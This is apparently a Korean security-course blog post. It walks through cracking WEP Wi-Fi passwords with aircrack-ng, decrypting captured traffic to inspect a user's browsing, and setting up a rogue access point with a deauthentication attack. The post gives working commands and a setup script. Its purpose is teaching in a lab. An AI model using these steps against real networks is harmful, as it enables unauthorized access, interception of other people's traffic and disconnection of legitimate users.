무선해킹중에서 구식 보안인 WEP를 뚫어 보겠다.
aircrack-ng 패거리를 사용해서 해보자
aircrack-ng는 wifi 네트워크 보안을 평가하는 도구모음이다.
모니터링, 공격, 테스트, 크래킹등 다양한 테스트를 지원한다.
airmon-ng : 해당 네트워크에 대해 모니터링을 시작한다.
airmon-ng start/stop/check(택1) networkame을 입력하면 모니터모드로 들어가게된다.
네트워크이름은 iwconfig 로 확인하자.
airmon-ng 를 실행하고 ipconfig와 iwconfig를 확인해보면 wlan0에 대한 상태와 정보가 다르게 나오는걸 확인 할 수있다.
airodump-ng : 현재 무선망에 돌아다니는 정보 실시간 모니터링
airodump는 실시간으로 모니터링 하기때문에 Hidden SSID 나 MAC Address Filter를 공략하는 발판으로 사용되기도한다.
BSSID나 ESSID 채널의 정보가 표시 되기 때문에 공격의 기틀을 마련해준다.
airodump-ng는 패킷을 수집할수 있다. 충분한 패킷이 수집되면 aircrack-ng로 wifi의 비밀번호를 알아 낼 수 있다.
패킷을 수집하는중
ls 로 파일을 살펴보면 패킷을 수집한 파일이 생성되어있다.
크랙을 할려면 5000개 이상의 데이터를 수집해야한다. 실습에서는 워낙 패킷이 안모여서 ... 미리 제공된 cap 파일로 크래킹을 해보자.
10000개정도의 데이터를 가진 wep.cap을 크래킹해보았다.
aircrack-ng 파일명
와이파이의 비밀번호를 알아냈다.
이 패킷을 수집하는동안 사용자는 무슨일을 했을까?
cap파일과 비밀번호만 있으면 wireshark를 통해 파악 할 수 있다.
airdecap-ng 를 사용해 패킷을 http와 tcp프로토콜에서 통신했던 정보로 바꿔준다.
airdecap-ng -w hex비밀번호 파일이름
실행하고 ls로 목록을 확인해보면
wep-dec.cap 파일이 생성되어있다.
와이어 샤크에서 확인해보자
패킷들의 통계로 어디를 자주다니는지도 볼수 있고 패킷내부에서 사용자가 이용한 정보 및 파일의 정보도 확인 할 수있을것이다.
Rogue AP + deauthentication attack
가짜 AP를 만들어 와이파이를 만들고 다른사람들이 기존에 이용하고있던 망을 deauthentication attack으로 끊어서 내가만든 wifi에 붙게 만드는 방법이다.
같은망에 있다면 패킷을 스니핑하기 더 쉬울것.
isc-dhcp-server 서버 생성 패키지 설치
apt-get install isc-dhcp-server
vi /etc/dhcp/dchpd.conf 수정
위의 dhcpd 파일안에 아래의 서브넷 정보를 추가한다.
---------------------------------------------------------------------------------dchpd.conf
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-server 8.8.8.8, 8.8.4.4;
}
----------------------------------------------------------------------------------------scsc.sh
bash 파일로 자신의 무선망을 AP로 만드는 작업
airmon-ng start wlan0
aitmon-ng check kill
#가짜 ap 생성
airbase-ng --essid "iptimejh" wlan0mon
#nat설정
ifconfig at0 up
ifconfig at0 10.0.0.1
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
#포워딩설정
echo 1 > /proc/sys/net/ipv4/ip_forward
#dhcp서버 실행
dhcp -d -f -cf /etc/dhcp/dchpd.conf at0
bash파일을 실행시키면 내가 생성한 가짜 AP가 생기고 와이파이망이 생긴다.
핸드폰으로 생성된 AP에 붙어보았다.
클라이언트(+맥주소) 가 붙었다고 나온다.
와이파이에 연결된 상태.
deauthentification 패킷은 와이파이에 연결된 인증을 취소하여 재연결을 유발함.
(SSID를 공격할때도 이 패킷을 보내 새로 연결할때의 패킷을 얻는등의 용도로 사용 할 수 있음.)
명령어에 채널의 정보가 필요하기때문에 airodump_ng wlan0mon으로 가짜AP의 정보를 확인, 채널 13이라는걸 알아냄
iwconfig wlan0mon channel 13 으로 AP의 채널에 접근하고
mdk3 wlan0mon d 로 deauthentification 을 날려준다.
두번더 재접속해도 계속해서 연결이 끊기는걸 확인할 수 있다.
다른와이파이로 갈아탐.
이런식으로 가짜 AP를 생성해서 자신에게 접속유도를해서 다양한 방식으로 스니핑 및 공격이 가능할것으로 예상.
'Kitri_NCS3기 보안과정 > 네트워크 해킹 및 보안' 카테고리의 다른 글
스위칭 방식 (0) | 2018.05.17 |
---|---|
프로토콜에 대한 이해 (0) | 2018.03.27 |
170419 DoS , DDos 공격 (0) | 2017.04.20 |
170420 metasploit Attack (0) | 2017.04.19 |
170418 DNS스푸핑 (0) | 2017.04.18 |